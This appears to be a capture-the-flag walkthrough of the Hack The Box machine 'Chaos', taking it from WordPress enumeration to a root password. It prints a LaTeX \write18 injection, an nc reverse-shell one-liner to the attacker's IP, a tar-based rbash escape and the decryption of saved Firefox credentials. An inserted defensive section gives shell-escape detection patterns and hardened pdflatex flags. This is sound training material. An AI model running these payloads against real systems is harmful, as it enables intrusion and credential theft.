Lab Walkthrough | Chaos (Hack The Box)

2021-04-02 01:29:12

Author: Twe1ve (core member, 贝塔安全实验室 / Beta Security Lab)

nmap scan results:

```text
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3
143/tcp open imap
|_imap-capabilities: LITERAL listed more STARTTLS ID LOGIN-REFERRALS IDLE ENABLE post-login capabilities Pre-login IMAP4rev1 OK LOGINDISABLEDA0001 have SASL-IR
|_ssl-date: TLS randomness does not represent time
10000/tcp open snet-sensor-mgmt
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on chaos
| Not valid before: 2018-10-28T12:45:28
|_Not valid after: 2023-10-27T12:45:28
|_ssl-date: TLS randomness does not represent time
```

Visiting the service on each port:

https://10.10.10.120:10000/ ---> Webmin login ---> default and common passwords fail ---> and too many wrong attempts get the login refused

http://10.10.10.120/wp/wordpress/ ---> WordPress site

http://10.10.10.120/wp/wordpress/ ---> password-protected post

```bash
wpscan --url http://10.10.10.120/wp/wordpress/ -e ap -e u
```

This yields the username human and the version WordPress 4.9.8.

Using human as the password unlocks the protected post:

```text
Creds for webmail :
username – ayush
password – jiujitsu
```

Logging into the mailbox with Evolution gives the hint "You are the password" and two files.

The Python script is an AES encryption script; decrypt the message with it:

https://raw.githubusercontent.com/happygirlzt/Cryptography/master/encrypt.py

```text
kali@kali:~$ python encrypt.py
Would you like to (E)ncrypt of (D)ecrypt?: 'D'
File to decrypt: 'enim_msg.txt'
Password: 'sahay'
Done.
kali@kali:~$ cat enim_msg.txt_dec
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK
```

Base64-decoding the output gives a message containing the link http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3 ---> a "create PDF" service

test1 cannot be generated, but test2 and test3 can.

Directory scanning finds:

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/doc/latex/adjustbox/ ---> LaTeX, so possibly command injection???

```latex
\immediate\write18{id}
```
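From the defender's side, as an added example that is not part of the original writeup: a Python pre-filter for a PDF-generation service that rejects the `\write18` primitive shown above and builds a pdflatex command line with shell escape disabled, which is the real fix. The sample documents, function names and output directory are constructed for this example.

```python
import re
from typing import List

# Constructed sample inputs for this example (not taken from the original page).
BENIGN_DOC = r"""\documentclass{article}
\usepackage{adjustbox}
\begin{document}
Quarterly report: 42\% growth, see \S 3.
\end{document}
"""

SHELL_ESCAPE_DOC = r"""\documentclass{article}
\begin{document}
\immediate\write18{id}
\end{document}
"""

# Primitives that reach the shell when shell escape is enabled. Matching them
# is only a cheap pre-filter: macro expansion can hide these tokens, so the
# real control is disabling shell escape at invocation (pdflatex_command).
SHELL_ESCAPE_PATTERNS = {
    "write18": re.compile(r"\\write\s*18\b"),               # \immediate\write18{...}
    "piped-input": re.compile(r"\\input\s*\{\s*\|"),        # \input{|"..."}
    "piped-openin": re.compile(r"\\openin[^\n]*?=\s*\|"),   # \openin\x=|"..."
    "shellesc-package": re.compile(r"\\ShellEscape\b"),
    "luatex": re.compile(r"\\directlua\b"),
}

def find_shell_escape(latex_source: str) -> List[str]:
    """Return the names of the dangerous primitives found in the submitted source."""
    return [name for name, pat in SHELL_ESCAPE_PATTERNS.items()
            if pat.search(latex_source)]

def pdflatex_command(tex_file: str, outdir: str) -> List[str]:
    """argv for compiling untrusted TeX: -no-shell-escape turns write18 off
    whatever texmf.cnf says, -halt-on-error/-interaction avoid hanging on
    prompts, -output-directory confines written files to one directory."""
    return ["pdflatex", "-no-shell-escape", "-halt-on-error",
            "-interaction=nonstopmode", f"-output-directory={outdir}", tex_file]

def compile_untrusted(latex_source: str, tex_file: str, outdir: str) -> List[str]:
    """Reject sources containing shell-escape primitives; otherwise return the
    hardened command line for a sandboxed, unprivileged worker to run."""
    findings = find_shell_escape(latex_source)
    if findings:
        raise ValueError("rejected LaTeX source: " + ", ".join(findings))
    return pdflatex_command(tex_file, outdir)
```

The pattern list is a first line of defence only; run the compiler with `-no-shell-escape` and inside a sandbox regardless of what the filter says.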

Reverse shell: ### LaTeX has trouble parsing characters such as &, so:

[Method 1] encode the & and ; characters

[Method 2] use a Python reverse shell

[Method 3] build an nc payload that contains no & character

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 0</tmp/f|nc 10.10.14.67 9999 >/tmp/f
```

Logging in as the ayush user with the mailbox credentials from earlier succeeds: ---> rbash: cd: restricted

Bypassing the rbash restriction:

https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

The usual methods do not get past it; the payload that finally bypasses it:

```bash
tar cf /dev/null rick.tar --checkpoint=1 --checkpoint-action=exec=/bin/bash
```

```bash
ayush@chaos:/home$ echo $PATH
echo $PATH
/home/ayush/.app
### the PATH needs fixing:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

A .mozilla folder is found in the user's home directory. Change into it, start SimpleHTTPServer, and download the credential files in that directory to the local machine to decrypt them.

```bash
wget http://10.10.10.120:8000/ --recursive
```

key4.db and logins.json are found in the firefox/bzo7sjt1.default/ directory.

Decrypting the credentials:

https://raw.githubusercontent.com/unode/firefox_decrypt/master/firefox_decrypt.py

```text
kali@kali:~/10.10.10.120:8000/firefox/bzo7sjt1.default$ python firefox_decrypt.py  /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default
2020-04-20 06:05:13,798 - WARNING - profile.ini not found in /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default
2020-04-20 06:05:13,798 - WARNING - Continuing and assuming '/home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default' is a profile location
Master Password for profile /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default:
Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'
```
